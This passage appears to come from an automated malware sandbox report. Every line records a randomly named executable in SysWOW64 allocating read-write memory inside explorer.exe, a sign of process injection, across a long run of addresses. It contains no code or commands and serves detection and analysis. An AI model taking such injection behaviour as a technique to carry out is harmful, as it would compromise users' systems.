Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: ECD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: ECE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: ECF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: ED00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: ED10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: ED20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: ED30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: ED40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: ED50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: ED60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: ED70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: ED80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: ED90000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EDA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EDE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EDF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FEC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FED0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FEE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FEF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FF00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FF10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FF20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FF30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FF40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FF50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FF60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FF70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FF80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FF90000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FFA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FFB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FFC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FFD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FFE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: FFF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10000000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10010000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10020000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10030000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10040000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10050000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10060000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10070000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10080000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10090000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 100A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 100B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 100C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 100D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 100E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 100F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10100000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10110000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10120000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10130000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10140000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10150000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10160000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10170000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10180000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10190000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 101A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 101B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 101C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 101D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 101E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 101F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10200000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10210000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10220000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10230000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10240000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10250000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10260000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10270000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10280000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10290000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 102A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 102B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 102C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 102D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 102E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 102F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10300000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10310000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10320000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10330000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10340000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10350000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10360000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10370000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10380000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10390000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 103A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 103B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 103C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 103D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 103E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 103F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10400000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10410000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10420000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10430000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10440000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10450000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10460000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10470000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10480000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10490000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 104A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 104B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 104C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 104D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 104E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 104F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10500000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10510000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10520000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10530000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10540000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10550000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10560000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10570000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10580000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10590000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 105A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 105B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 105C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 105D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 105E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 105F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10600000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10610000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10620000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10630000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10640000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10650000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10660000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10670000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10680000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10690000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 106A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 106B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 106C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 106D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 106E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 106F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10700000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10710000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10720000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10730000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10740000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10750000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10760000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10770000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10780000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10790000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 107A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 107B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 107C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 107D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 107E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 107F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10800000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10810000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10820000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10830000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10840000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10850000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10860000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10870000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10880000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10890000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 108A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 108B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 108C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 108D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 108E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 108F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10900000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10910000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10920000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10930000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10940000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10950000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10960000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10970000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10980000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10990000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 109A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 109B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 109C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 109D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 109E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 109F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10A00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10A10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10A20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10A30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10A40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10A50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10A60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10A70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10A80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10A90000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10AA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10AB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10AC0000 protect: page read and writeJump to behavior
